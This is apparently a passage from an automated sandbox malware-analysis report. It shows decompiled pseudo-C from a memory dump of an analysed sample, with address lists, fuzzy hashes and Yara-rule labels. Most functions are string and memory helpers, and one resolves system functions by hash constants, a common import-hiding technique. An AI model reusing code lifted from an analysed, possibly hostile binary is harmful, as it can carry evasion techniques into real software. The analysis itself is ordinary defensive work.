									 *((short*)(E008B9640(_t563 + 0x404, E008B9650(_t563 + 0x400) + 0xfffffffe))) =  *(_t561 + _t552 * 2) & 0x0000ffff;
									_t552 = _t552 + 1;
									__eflags = _t552 -  *((intOrPtr*)(_t534 + 0x18));
								} while (_t552 <  *((intOrPtr*)(_t534 + 0x18)));
								_t370 =  *_t563;
								_t559 =  *((intOrPtr*)(_t563 + 4));
							}
							_t290 = E008B9640(_t563 + 0x434, 0);
							_t523 =  *((intOrPtr*)(_t534 + 0x1c));
							_t291 = E008C4830(_t290,  *((intOrPtr*)(_t534 + 0x1c)));
							__eflags =  *((intOrPtr*)(_t534 + 0x14));
							if( *((intOrPtr*)(_t534 + 0x14)) > 0) {
								 *_t563 = _t370;
								_t551 = 0;
								__eflags = 0;
								 *((intOrPtr*)(_t563 + 4)) = _t559;
								_t372 = _t291;
								do {
									E008B9670(_t563 + 0x3f4, E008B9650(_t563 + 0x3f0) + 1);
									_t324 = E008B9640(_t563 + 0x3f4, E008B9650(_t563 + 0x3f0) - 1);
									_t523 = _t324;
									__eflags =  *((intOrPtr*)(_t372 + _t551 * 4));
									_t551 = _t551 + 1;
									 *_t324 = 0 | __eflags > 0x00000000;
									__eflags = _t551 -  *((intOrPtr*)(_t534 + 0x14));
								} while (_t551 <  *((intOrPtr*)(_t534 + 0x14)));
								_t370 =  *_t563;
								_t559 =  *((intOrPtr*)(_t563 + 4));
							}
							 *_t563 = 0;
							_push(0);
							E008B9350(_t563 + 0x150);
							_t550 = _t563 + 4;
							 *((intOrPtr*)(_t550 + 0x158)) = 0;
							 *((intOrPtr*)(_t550 + 0x15c)) = 0;
							 *((intOrPtr*)(_t550 + 0x160)) = 0;
							 *((intOrPtr*)(_t550 + 0x164)) = 0;
							E008A0B70(_t550, 0, 0x40);
							E008A0B70(_t563 + 0x50, 0, 0x108);
							_t564 = _t563 + 0x18;
							_push(_t370);
							E008C3CE0(_t564 + 4, __eflags);
							_push(_t564 + 0x3e4);
							E008C4170(_t564 + 4);
							_t371 = _t564 + 0x16c;
							_push(_t371);
							E008C3EF0(_t564 + 4);
							_push(_t371);
							_t193 = _t559 + 0x10; // 0x10
							E008B9520(_t193);
							E008B9510(_t371);
							_t195 = _t559 + 8; // 0x8
							E008B0B30(_t195, _t523,  *((intOrPtr*)(_t564 + 0x454)));
							E008B0B30(_t559, _t523,  *((intOrPtr*)(_t564 + 0x44c)));
							E008C2970(_t371, _t564 + 0x15c, _t534);
							_t461 =  *((intOrPtr*)(_t564 + 0x168));
							__eflags =  *((intOrPtr*)(_t564 + 0x168));
							if( *((intOrPtr*)(_t564 + 0x168)) != 0) {
								E00892A20(_t461, 1);
							}
							E008B9510(_t564 + 0x14c);
							E008B7560(_t564 + 0x410, _t534, _t550);
							E008B9510(_t564 + 0x400);
							E008B9510(_t564 + 0x3f0);
							E008B0B10(_t564 + 0x3e4);
							E008B9510(_t564 + 0x430);
							E008B0B10(_t564 + 0x45c);
							E008B0B10(_t564 + 0x454);
							E008B0B10(_t564 + 0x44c);
							E008B7560(_t564 + 0x440, _t534, _t550);
							return 1;
						} else {
							_t340 = E00899E70(_t370, _t559, __eflags);
							E008B9510(_t563 + 0x430);
							E008B0B10(_t563 + 0x45c);
							E008B0B10(_t563 + 0x454);
							E008B0B10(_t563 + 0x44c);
							E008B7560(_t563 + 0x440, _t533, _t543);
							return _t340;
						}
						goto L60;
						L35:
						_t541 = _t542 + 1;
					}
				}
				L60:
			}

0x00899e70
0x00899e7a
0x00899e7e
0x00899e8e
0x00899eb2
0x00899eb7
0x00899eb9
0x0089a2cc
0x0089a2cc
0x0089a2d8
0x00899ebf
0x00899ec1
0x00899ec6
0x00899eca
0x00000000
0x00899ed0
0x00899ed0
0x00000000
0x00899ed0
0x00899eca
0x00899e9d
0x00899e9d
0x00899ed8
0x00899eda
0x00899ee1
0x00899ee8
0x00899ef7
0x00899f03
0x00899f18
0x00899f2b
0x00899f3f
0x00899f4f
0x00899f56
0x00899f62
0x00899f6e
0x00899f7a
0x00899f83
0x00899f86
0x00899f8a
0x00899f8d
0x00899f94
0x00899f99
0x00899fa9
0x00899fab
0x00899faf
0x00899fb6
0x00899fb6
0x00899fbd
0x00899fc7
0x00899fd4
0x00899fee
0x00899ff5
0x0089a001
0x0089a014
0x00000000
0x0089a016
0x0089a016
0x0089a016
0x0089a014
0x0089a021
0x0089a02e
0x0089a030
0x0089a039
0x0089a044
0x0089a040
0x0089a040
0x0089a040
0x0089a04b
0x0089a04e
0x0089a04e
0x0089a04b
0x0089a053
0x0089a065
0x0089a075
0x0089a07c
0x0089a083
0x0089a08f
0x0089a09f
0x0089a0a3
0x0089a0a6
0x0089a0aa
0x0089a0ac
0x0089a0b0
0x0089a0c0
0x0089a0c2
0x0089a0cf
0x00000000
0x00000000
0x0089a0de
0x0089a0ea
0x0089a10a
0x0089a116
0x0089a132
0x0089a148
0x0089a164
0x0089a170
0x0089a17e
0x0089a191
0x0089a263
0x0089a26a
0x0089a271
0x0089a274
0x0089a277
0x0089a27c
0x0089a284
0x0089a28d
0x0089a28d
0x0089a197
0x0089a19f
0x0089a1a5
0x0089a1ab
0x0089a1af
0x0089a1b6
0x0089a1c3
0x0089a1c8
0x0089a1e4
0x0089a1ed
0x0089a1f2
0x0089a1f8
0x0089a1fa
0x0089a203
0x0089a207
0x00000000
0x0089a209
0x0089a209
0x0089a20d
0x0089a20f
0x0089a20f
0x0089a20d
0x00000000
0x0089a207
0x0089a212
0x0089a212
0x0089a213
0x0089a21c
0x0089a220
0x0089a222
0x0089a222
0x0089a23a
0x0089a246
0x0089a253
0x0089a25c
0x0089a25c
0x0089a253
0x0089a299
0x0089a2a5
0x0089a2b8
0x0089a2c1
0x00000000
0x0089a2c1
0x0089a2e2
0x0089a2e5
0x0089a2ee
0x0089a300
0x0089a322
0x0089a32e
0x0089a33a
0x0089a348
0x0089a356
0x0089a374
0x0089a392
0x0089a3a0
0x0089a3ac
0x0089a3d1
0x0089a3dd
0x0089a3f9
0x0089a40f
0x0089a414
0x0089a41c
0x0089a425
0x0089a425
0x0089a431
0x0089a442
0x0089a444
0x0089a4a3
0x0089a4a8
0x0089a4b1
0x0089a4b6
0x0089a4bf
0x0089a4c6
0x0089a4cd
0x0089a4cf
0x0089a4d2
0x0089a4d5
0x0089a4e1
0x0089a4ed
0x0089a4f2
0x0089a4f7
0x0089a513
0x0089a518
0x0089a52a
0x0089a52f
0x0089a52f
0x0089a52f
0x0089a4f9
0x0089a50e
0x0089a50e
0x0089a54d
0x0089a552
0x0089a57b
0x0089a595
0x0089a59a
0x0089a59e
0x0089a5a0
0x0089a5a3
0x0089a5a3
0x0089a5a5
0x0089a5a9
0x0089a5ab
0x0089a5d4
0x0089a5d9
0x0089a5da
0x0089a5da
0x0089a5df
0x0089a5e2
0x0089a5e2
0x0089a5fb
0x0089a600
0x0089a604
0x0089a606
0x0089a609
0x0089a609
0x0089a60b
0x0089a60f
0x0089a611
0x0089a628
0x0089a64e
0x0089a651
0x0089a652
0x0089a652
0x0089a657
0x0089a65a
0x0089a65a
0x0089a66a
0x0089a671
0x0089a673
0x0089a678
0x0089a67c
0x0089a67e
0x0089a681
0x0089a681
0x0089a683
0x0089a687
0x0089a689
0x0089a6a1
0x0089a6bb
0x0089a6c0
0x0089a6c4
0x0089a6c9
0x0089a6ca
0x0089a6cc
0x0089a6cc
0x0089a6d1
0x0089a6d4
0x0089a6d4
0x0089a6da
0x0089a6dd
0x0089a6e5
0x0089a6ec
0x0089a6f0
0x0089a6f6
0x0089a6fc
0x0089a702
0x0089a70c
0x0089a71d
0x0089a722
0x0089a725
0x0089a72a
0x0089a736
0x0089a73b
0x0089a740
0x0089a747
0x0089a74c
0x0089a751
0x0089a752
0x0089a755
0x0089a75c
0x0089a768
0x0089a76b
0x0089a779
0x0089a785
0x0089a78a
0x0089a791
0x0089a793
0x0089a797
0x0089a797
0x0089a7a3
0x0089a7af
0x0089a7bb
0x0089a7c7
0x0089a7d3
0x0089a7df
0x0089a7eb
0x0089a7f7
0x0089a803
0x0089a80f
0x0089a823
0x0089a446
0x0089a44a
0x0089a458
0x0089a464
0x0089a470
0x0089a47c
0x0089a488
0x0089a499
0x0089a499
0x00000000
0x0089a2c6
0x0089a2c6
0x0089a2c6
0x0089a0ac
0x00000000

Strings

@, xrefs: 0089A513

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 991b12cc2eab3d0cd1f67ce68a530894a6e4abfba198ee046f9184ac45273e00
Instruction ID: 70f5d5a5df735e3780753530ebfcb64d1da4c876d2aee1dc07da0c5bd2afc5bd
Opcode Fuzzy Hash: 991b12cc2eab3d0cd1f67ce68a530894a6e4abfba198ee046f9184ac45273e00
Instruction Fuzzy Hash: 3C322E705183459BD735EB28C852BEFB3A5FF91304F04482DE28A97292EF716909CB97

Uniqueness

Uniqueness Score: -1.00%

Function 008B4CA0, Relevance: 1.6, Strings: 1, Instructions: 358
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E008B4CA0(signed int* __ecx, intOrPtr* _a4) {
				char _v28;
				unsigned int _v32;
				void* _v36;
				unsigned int _t70;
				char* _t75;
				signed int _t78;
				signed int _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				intOrPtr* _t90;
				signed int _t92;
				void* _t98;
				void* _t99;
				signed int _t101;
				char _t102;
				char _t103;
				char _t104;
				signed int _t106;
				signed int _t107;
				signed int _t110;
				char* _t111;
				void* _t112;
				signed int _t115;
				char _t116;
				char _t117;
				char _t118;
				char _t119;
				char _t120;
				void* _t122;
				char* _t123;
				char _t133;
				char _t134;
				char _t136;
				char _t137;
				char* _t139;
				void* _t140;
				signed int _t142;
				char _t146;
				signed int _t148;
				signed int _t154;
				unsigned int _t155;
				char _t157;
				char _t158;
				char* _t161;
				char* _t162;
				intOrPtr* _t169;
				unsigned int _t170;
				void* _t171;
				signed int _t172;
				void* _t174;

				_t174 = (_t172 & 0xfffffff0) - 0x14;
				_t70 =  *0x8ca24c; // 0xa0d0920
				_t119 =  *0x8ca250; // 0x0
				_v32 = _t70;
				_v28 = _t119;
				_t101 =  *__ecx;
				if(_t101 == 0) {
					_t120 = 0;
					_t88 = 0;
				} else {
					_t142 = _t101 & 0x0000000f;
					if(_t142 == 0) {
						L5:
						asm("pxor xmm0, xmm0");
						_t98 =  ~( ~_t142 + 0x0000000f & 0x0000000f) + 0x7fffffff;
						while(1) {
							asm("movdqu xmm1, [ecx+edx]");
							asm("pcmpeqb xmm1, xmm0");
							asm("pmovmskb eax, xmm1");
							if(_t70 != 0) {
								break;
							}
							_t142 = _t142 + 0x10;
							if(_t142 < _t98) {
								continue;
							} else {
								if(_t98 >= 0x7fffffff) {
									L11:
									_t88 = 0x7fffffff;
									goto L12;
								} else {
									while( *((char*)(_t98 + _t101)) != 0) {
										_t98 = _t98 + 1;
										if(_t98 < 0x7fffffff) {
											continue;
										} else {
											goto L11;
										}
										goto L18;
									}
									goto L102;
								}
							}
							goto L18;
						}
						asm("bsf ebx, eax");
						_t88 = _t98 + _t142;
						goto L102;
					} else {
						_t88 = 0;
						_t142 =  ~_t142 + 0x10;
						while( *((char*)(_t88 + _t101)) != 0) {
							_t88 = _t88 + 1;
							if(_t88 < _t142) {
								continue;
							} else {
								goto L5;
							}
							goto L18;
						}
						L102:
						if(_t88 > 0) {
							L12:
							_t120 = 0;
							_t155 = _v32;
							_t171 = 0;
							_v36 = _t88;
							while(_t155 != 0) {
								_t86 =  *((intOrPtr*)(_t120 + _t101));
								_t99 = 0;
								while(_t86 !=  *((intOrPtr*)(_t174 + _t99 + 4))) {
									_t99 = _t99 + 1;
									if( *((char*)(_t174 + _t99 + 4)) != 0) {
										continue;
									}
									goto L17;
								}
								_t171 = _t171 + 1;
								_t120 = _t120 + 1;
								if(_t171 < _v36) {
									continue;
								} else {
									break;
								}
								L106:
							}
							L17:
							_t88 = _v36;
						} else {
							_t120 = 0;
						}
						goto L18;
						L93:
						return _t90;
						goto L106;
					}
				}
				L18:
				_t89 = _t88 - 1;
				_t146 = _t88 - _t120;
				if(_t89 >= _t120) {
					_t170 = _v32;
					_v36 = _t120;
					while(_t170 != 0) {
						_t85 =  *((intOrPtr*)(_t89 + _t101));
						_t140 = 0;
						while(_t85 !=  *((intOrPtr*)(_t174 + _t140 + 4))) {
							_t140 = _t140 + 1;
							if( *((char*)(_t174 + _t140 + 4)) != 0) {
								continue;
							}
							goto L24;
						}
						_t89 = _t89 - 1;
						_t146 = _t146 - 1;
						if(_t89 >= _v36) {
							continue;
						} else {
							break;
						}
						goto L93;
					}
					L24:
					_t120 = _v36;
				}
				_t90 = _a4;
				if(_t146 != 0) {
					if(_t101 == 0) {
						_t157 = 0;
					} else {
						_t81 = _t101 & 0x0000000f;
						if(_t81 == 0) {
							L39:
							asm("pxor xmm0, xmm0");
							_t157 =  ~( ~_t81 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							while(1) {
								asm("movdqu xmm1, [ecx+eax]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb ebx, xmm1");
								if(_t90 != 0) {
									break;
								}
								_t81 = _t81 + 0x10;
								if(_t81 < _t157) {
									continue;
								} else {
									_t90 = _a4;
									if(_t157 >= 0x7fffffff) {
										L45:
										_t157 = 0x7fffffff;
									} else {
										while( *((char*)(_t157 + _t101)) != 0) {
											_t157 = _t157 + 1;
											if(_t157 < 0x7fffffff) {
												continue;
											} else {
												goto L45;
											}
											goto L46;
										}
									}
								}
								goto L46;
							}
							_t169 = _t90;
							asm("bsf esi, esi");
							_t90 = _a4;
							_t157 = _t169 + _t81;
						} else {
							_t157 = 0;
							_t81 =  ~_t81 + 0x10;
							while( *((char*)(_t157 + _t101)) != 0) {
								_t157 = _t157 + 1;
								if(_t157 < _t81) {
									continue;
								} else {
									goto L39;
								}
								goto L46;
							}
						}
					}
					L46:
					_t121 =  <=  ? 0 : _t120;
					_t122 =  <  ? _t157 :  <=  ? 0 : _t120;
					_t158 = _t157 - _t122;
					if(_t146 < 0 || _t146 > _t158) {
						_t146 = _t158;
					}
					 *_t90 = 0;
					 *(_t90 + 4) = 0;
					_t161 = _t122 + _t101;
					if(_t161 == 0 ||  *(_t101 + _t122) == 0) {
						_push(0x40);
						_t162 = E008A1030();
						_t174 = _t174 + 4;
						_t123 =  *_t90;
						if(_t123 == 0) {
							 *_t162 = 0;
						} else {
							if(_t162 != 0) {
								_t102 =  *_t123;
								 *_t162 = _t102;
								if(_t102 != 0) {
									_t148 = 0;
									while(1) {
										_t148 = _t148 + 1;
										_t103 =  *((char*)(_t123 + _t148 * 2 - 1));
										 *((char*)(_t162 + _t148 * 2 - 1)) = _t103;
										if(_t103 == 0) {
											goto L90;
										}
										_t104 =  *((char*)(_t123 + _t148 * 2));
										 *((char*)(_t162 + _t148 * 2)) = _t104;
										if(_t104 != 0) {
											continue;
										}
										goto L90;
									}
								}
							}
							L90:
							_push(1);
							_push(_t123);
							E008A10B0();
							_t174 = _t174 + 8;
						}
						goto L92;
					} else {
						if(_t146 == 0) {
							_t115 = _t101 + _t122;
							_t78 = _t115 & 0x0000000f;
							if(_t78 == 0) {
								L56:
								asm("pxor xmm0, xmm0");
								_t146 =  ~( ~_t78 + 0x0000000f & 0x0000000f) + 0x7fffffff;
								while(1) {
									asm("movdqu xmm1, [ecx+eax]");
									asm("pcmpeqb xmm1, xmm0");
									asm("pmovmskb edx, xmm1");
									if(_t122 != 0) {
										break;
									}
									_t78 = _t78 + 0x10;
									if(_t78 < _t146) {
										continue;
									} else {
										if(_t146 >= 0x7fffffff) {
											L62:
											_t146 = 0x7fffffff;
										} else {
											while( *((char*)(_t146 + _t115)) != 0) {
												_t146 = _t146 + 1;
												if(_t146 < 0x7fffffff) {
													continue;
												} else {
													goto L62;
												}
												goto L63;
											}
										}
									}
									goto L63;
								}
								asm("bsf edi, edx");
								_t146 = _t146 + _t78;
							} else {
								_t146 = 0;
								_t78 =  ~_t78 + 0x10;
								while( *((char*)(_t146 + _t115)) != 0) {
									_t146 = _t146 + 1;
									if(_t146 < _t78) {
										continue;
									} else {
										goto L56;
									}
									goto L63;
								}
							}
						}
						L63:
						_t36 = _t146 + 1; // 0x80000000
						_t106 =  <=  ? 0x40 : _t36;
						if(_t106 > 0) {
							_v32 = (_t106 >> 5 >> 0x1a) + _t106 >> 6;
							_t107 = _t106 & 0x8000003f;
							if(_t107 < 0) {
								_t107 = (_t107 - 0x00000001 | 0xffffffc0) + 1;
							}
							_t110 = _v32 + (0 | _t107 > 0x00000000) << 6;
							_v32 = _t110;
							_push(_t110);
							_t75 = E008A1030();
							_t174 = _t174 + 4;
							_t111 =  *_t90;
							if(_t111 == 0) {
								 *_t75 = 0;
							} else {
								if(_t75 != 0) {
									_t134 =  *_t111;
									 *_t75 = _t134;
									if(_t134 != 0) {
										_v36 = _t161;
										_t92 = 0;
										while(1) {
											_t92 = _t92 + 1;
											_t136 =  *((char*)(_t111 + _t92 * 2 - 1));
											 *((char*)(_t75 + _t92 * 2 - 1)) = _t136;
											if(_t136 == 0) {
												break;
											}
											_t137 =  *((char*)(_t111 + _t92 * 2));
											 *((char*)(_t75 + _t92 * 2)) = _t137;
											if(_t137 != 0) {
												continue;
											}
											break;
										}
										_t161 = _v36;
										_t90 = _a4;
									}
								}
								_push(1);
								_push(_t111);
								_v36 = _t75;
								E008A10B0();
								_t75 = _v36;
								_t174 = _t174 + 8;
							}
							 *(_t90 + 4) = _v32;
							 *_t90 = _t75;
						} else {
							_t75 = 0;
						}
						if(_t75 != 0) {
							_t112 = 0;
							while(1) {
								_t133 =  *_t161;
								_t112 = _t112 + 1;
								 *_t75 = _t133;
								if(_t146 != 0 && _t112 == _t146) {
									break;
								}
								if(_t133 != 0) {
									_t75 = _t75 + 1;
									_t161 = _t161 + 1;
									continue;
								}
								goto L93;
							}
							 *((char*)(_t75 + 1)) = 0;
						}
					}
				} else {
					_push(0x40);
					 *_t90 = 0;
					 *(_t90 + 4) = 0;
					_t162 = E008A1030();
					_t174 = _t174 + 4;
					_t139 =  *_t90;
					if(_t139 == 0) {
						 *_t162 = 0;
					} else {
						if(_t162 != 0) {
							_t116 =  *_t139;
							 *_t162 = _t116;
							if(_t116 != 0) {
								_t154 = 0;
								while(1) {
									_t154 = _t154 + 1;
									_t117 =  *((char*)(_t139 + _t154 * 2 - 1));
									 *((char*)(_t162 + _t154 * 2 - 1)) = _t117;
									if(_t117 == 0) {
										goto L32;
									}
									_t118 =  *((char*)(_t139 + _t154 * 2));
									 *((char*)(_t162 + _t154 * 2)) = _t118;
									if(_t118 != 0) {
										continue;
									}
									goto L32;
								}
							}
						}
						L32:
						_push(1);
						_push(_t139);
						E008A10B0();
						_t174 = _t174 + 8;
					}
					L92:
					 *(_t90 + 4) = 0x40;
					 *_t90 = _t162;
				}
				goto L93;
			}

0x008b4ca9
0x008b4cac
0x008b4cb1
0x008b4cb7
0x008b4cbb
0x008b4cbf
0x008b4cc3
0x008b508e
0x008b5090
0x008b4cc9
0x008b4ccb
0x008b4cce
0x008b4ce6
0x008b4cea
0x008b4cf6
0x008b4cfc
0x008b4cfc
0x008b4d01
0x008b4d05
0x008b4d0b
0x00000000
0x00000000
0x008b4d11
0x008b4d16
0x00000000
0x008b4d18
0x008b4d1e
0x008b4d33
0x008b4d33
0x00000000
0x008b4d20
0x008b4d20
0x008b4d2a
0x008b4d31
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b4d31
0x00000000
0x008b4d20
0x008b4d1e
0x00000000
0x008b4d16
0x008b5087
0x008b508a
0x00000000
0x008b4cd0
0x008b4cd2
0x008b4cd4
0x008b4cd7
0x008b4ce1
0x008b4ce4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b4ce4
0x008b5078
0x008b507a
0x008b4d38
0x008b4d38
0x008b4d3a
0x008b4d3f
0x008b4d41
0x008b4d44
0x008b4d48
0x008b4d4b
0x008b4d4d
0x008b4d57
0x008b4d5d
0x00000000
0x00000000
0x00000000
0x008b4d5d
0x008b5068
0x008b5069
0x008b506d
0x00000000
0x008b5073
0x00000000
0x008b5073
0x00000000
0x008b506d
0x008b4d5f
0x008b4d5f
0x008b5080
0x008b5080
0x008b5080
0x00000000
0x008b5024
0x008b502f
0x00000000
0x008b502f
0x008b4cce
0x008b4d62
0x008b4d64
0x008b4d65
0x008b4d69
0x008b4d6b
0x008b4d70
0x008b4d73
0x008b4d77
0x008b4d7a
0x008b4d7c
0x008b4d86
0x008b4d8c
0x00000000
0x00000000
0x00000000
0x008b4d8c
0x008b5058
0x008b5059
0x008b505d
0x00000000
0x008b5063
0x00000000
0x008b5063
0x00000000
0x008b505d
0x008b4d8e
0x008b4d8e
0x008b4d8e
0x008b4d91
0x008b4d96
0x008b4df3
0x008b5051
0x008b4df9
0x008b4dfb
0x008b4dfe
0x008b4e12
0x008b4e16
0x008b4e22
0x008b4e28
0x008b4e28
0x008b4e2d
0x008b4e31
0x008b4e37
0x00000000
0x00000000
0x008b4e3d
0x008b4e42
0x00000000
0x008b4e44
0x008b4e44
0x008b4e4d
0x008b4e5e
0x008b4e5e
0x00000000
0x008b4e4f
0x008b4e55
0x008b4e5c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b4e5c
0x008b4e4f
0x008b4e4d
0x00000000
0x008b4e42
0x008b5042
0x008b5044
0x008b5047
0x008b504a
0x008b4e00
0x008b4e02
0x008b4e04
0x008b4e07
0x008b4e0d
0x008b4e10
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b4e10
0x008b4e07
0x008b4dfe
0x008b4e63
0x008b4e67
0x008b4e6c
0x008b4e6f
0x008b4e73
0x008b4e79
0x008b4e79
0x008b4e7d
0x008b4e7f
0x008b4e84
0x008b4e86
0x008b4fd1
0x008b4fd8
0x008b4fda
0x008b4fdd
0x008b4fe1
0x008b5018
0x008b4fe3
0x008b4fe5
0x008b4fe7
0x008b4fea
0x008b4fee
0x008b4ff0
0x008b4ff2
0x008b4ff2
0x008b4ff3
0x008b4ff8
0x008b4ffe
0x00000000
0x00000000
0x008b5000
0x008b5004
0x008b5009
0x00000000
0x00000000
0x00000000
0x008b5009
0x008b4ff2
0x008b4fee
0x008b500b
0x008b500b
0x008b500d
0x008b500e
0x008b5013
0x008b5013
0x00000000
0x008b4e96
0x008b4e98
0x008b4e9a
0x008b4e9e
0x008b4ea1
0x008b4eb5
0x008b4eb9
0x008b4ec5
0x008b4ecb
0x008b4ecb
0x008b4ed0
0x008b4ed4
0x008b4eda
0x00000000
0x00000000
0x008b4ee0
0x008b4ee5
0x00000000
0x008b4ee7
0x008b4eed
0x008b4efe
0x008b4efe
0x00000000
0x008b4eef
0x008b4ef5
0x008b4efc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b4efc
0x008b4eef
0x008b4eed
0x00000000
0x008b4ee5
0x008b5038
0x008b503b
0x008b4ea3
0x008b4ea5
0x008b4ea7
0x008b4eaa
0x008b4eb0
0x008b4eb3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b4eb3
0x008b4eaa
0x008b4ea1
0x008b4f03
0x008b4f08
0x008b4f0e
0x008b4f13
0x008b4f29
0x008b4f2d
0x008b4f33
0x008b4f3b
0x008b4f3b
0x008b4f49
0x008b4f4c
0x008b4f50
0x008b4f51
0x008b4f56
0x008b4f59
0x008b4f5d
0x008b4fa7
0x008b4f5f
0x008b4f61
0x008b4f63
0x008b4f66
0x008b4f6a
0x008b4f6e
0x008b4f71
0x008b4f73
0x008b4f73
0x008b4f74
0x008b4f79
0x008b4f7f
0x00000000
0x00000000
0x008b4f81
0x008b4f85
0x008b4f8a
0x00000000
0x00000000
0x00000000
0x008b4f8a
0x008b4f8c
0x008b4f8f
0x008b4f8f
0x008b4f6a
0x008b4f92
0x008b4f94
0x008b4f95
0x008b4f99
0x008b4f9e
0x008b4fa2
0x008b4fa2
0x008b4fae
0x008b4fb1
0x008b4f15
0x008b4f15
0x008b4f15
0x008b4fb5
0x008b4fb7
0x008b4fbd
0x008b4fbd
0x008b4fc0
0x008b4fc1
0x008b4fc5
0x00000000
0x00000000
0x008b4fcd
0x008b4fbb
0x008b4fbc
0x00000000
0x008b4fbc
0x00000000
0x008b4fcd
0x008b5032
0x008b5032
0x008b4fb5
0x008b4d98
0x008b4d9a
0x008b4d9c
0x008b4d9e
0x008b4da6
0x008b4da8
0x008b4dab
0x008b4daf
0x008b4de9
0x008b4db1
0x008b4db3
0x008b4db5
0x008b4db8
0x008b4dbc
0x008b4dbe
0x008b4dc0
0x008b4dc0
0x008b4dc1
0x008b4dc6
0x008b4dcc
0x00000000
0x00000000
0x008b4dce
0x008b4dd2
0x008b4dd7
0x00000000
0x00000000
0x00000000
0x008b4dd7
0x008b4dc0
0x008b4dbc
0x008b4dd9
0x008b4dd9
0x008b4ddb
0x008b4ddc
0x008b4de1
0x008b4de1
0x008b501b
0x008b501b
0x008b5022
0x008b5022
0x00000000

Strings

, xrefs: 008B4CAC

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID: 0-3688684798
Opcode ID: 011ac15e005a73c5eb763c447ecc202f90af02b6b10c73c3a8d681b4b8dc7a50
Instruction ID: 28deb3f52f3d675032824cebbc7f790b4c90a5f483ac9ded02ff87e3725dc14e
Opcode Fuzzy Hash: 011ac15e005a73c5eb763c447ecc202f90af02b6b10c73c3a8d681b4b8dc7a50
Instruction Fuzzy Hash: B5B16E35909B9246DB35593C84D23BA7AD2FFD2314F2DD76CD8E5CB397DA3188428282

Uniqueness

Uniqueness Score: -1.00%

Function 008A2980, Relevance: 1.4, Strings: 1, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E008A2980(void* __ecx, intOrPtr __edi, intOrPtr __esi) {
				intOrPtr _t41;
				void* _t56;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t80;
				void* _t85;
				void* _t88;
				void* _t91;
				intOrPtr _t94;
				intOrPtr* _t95;
				void* _t98;
				void* _t99;
				void* _t100;
				intOrPtr* _t101;

				_t101 = _t100 - 0x1c;
				_t56 = __ecx;
				_t94 =  *0x8cb208; // 0xee5a38
				if(_t94 == 0x228324a5) {
					_push(0x80);
					_t95 = E008A1030();
					_t101 = _t101 + 4;
					if(_t95 == 0) {
						_t95 = 0;
					} else {
						_t15 = _t95 + 8; // 0x8
						 *_t95 = 0;
						 *((intOrPtr*)(_t95 + 4)) = 0;
						E008A8810(_t15, 0);
						_t17 = _t95 + 0x10; // 0x10
						E008A8810(_t17, 0);
						_t18 = _t95 + 0x18; // 0x18
						E008A8810(_t18, 0);
						_t19 = _t95 + 0x20; // 0x20
						E008A8810(_t19, 0);
						_t20 = _t95 + 0x28; // 0x28
						E008A8810(_t20, 0);
						_t21 = _t95 + 0x30; // 0x30
						E008A8810(_t21, 0);
						_t22 = _t95 + 0x38; // 0x38
						E008A8810(_t22, 0);
						_t23 = _t95 + 0x40; // 0x40
						E008A8810(_t23, 0);
						_t24 = _t95 + 0x48; // 0x48
						E008A8810(_t24, 0);
						_t25 = _t95 + 0x50; // 0x50
						 *((intOrPtr*)(_t101 + 4)) = __esi;
						_t91 = 6;
						 *_t101 = __edi;
						_t88 = _t25;
						do {
							E008A8810(_t88, 0);
							_t88 = _t88 + 8;
							_t91 = _t91 - 1;
						} while (_t91 != 0);
					}
					 *0x8cb208 = _t95;
				}
				if(E008A9DC0(_t95 + 0x10) == 0) {
					L14:
					_t80 =  *0x8cb208; // 0xee5a38
					E008A88C0(_t101 + 0x18, _t80 + 0x10);
					E008AFDB0(_t101 + 0x18, _t56);
					E008A8CA0(_t101 + 0x14);
					return _t56;
				} else {
					 *((intOrPtr*)(_t101 + 0x10)) = 0x80;
					E008A8810(_t101 + 0xc, 0x80);
					_t64 =  *0x8cb1f4; // 0xec1568
					if(_t64 == 0xc139578) {
						 *0x8cb1f4 = 0;
						goto L8;
					} else {
						if(_t64 == 0) {
							L8:
							_push(0x3ab94787);
							_t98 = E008A7564(0x3ab94787);
							if(_t98 == 0) {
								if(E008A6C50(0x3ab94787) != 0) {
									_push(0x3ab94787);
									_t98 = E008A7564(0x3ab94787);
								}
							}
							if(_t98 == 0) {
								goto L13;
							} else {
								_t101 = _t101 + 0xfffffff8;
								_t41 = E008A67C8(_t98, 0x9518f3b9);
								goto L11;
							}
						} else {
							do {
								_t99 = 0;
								_t85 = 0;
								while( *((intOrPtr*)(_t85 + _t64 + 8)) != 0x9518f3b9) {
									_t99 = _t99 + 1;
									_t85 = _t85 + 0x18;
									if(_t99 < 0x10) {
										continue;
									} else {
										goto L7;
									}
									goto L26;
								}
								_t41 =  *((intOrPtr*)(_t85 + _t64 + 0x14));
								if(_t41 != 0) {
									L11:
									if(_t41 == 0) {
										L13:
										_t66 =  *0x8cb208; // 0xee5a38
										E008A8CC0(_t66 + 0x10,  *((intOrPtr*)(_t101 + 8)));
										E008A8CA0(_t101 + 8);
										goto L14;
									} else {
										_push(_t101 + 0x10);
										_push( *((intOrPtr*)(_t101 + 0xc)));
										asm("int3");
										return _t41;
									}
								} else {
									goto L8;
								}
								goto L26;
								L7:
								asm("o16 nop [eax+eax]");
								_t64 =  *((intOrPtr*)(_t64 + 0x180));
							} while (_t64 != 0);
							goto L8;
						}
					}
				}
				L26:
			}

0x008a2982
0x008a2985
0x008a2987
0x008a2993
0x008a2ab7
0x008a2ac1
0x008a2ac3
0x008a2ac8
0x008a2b5a
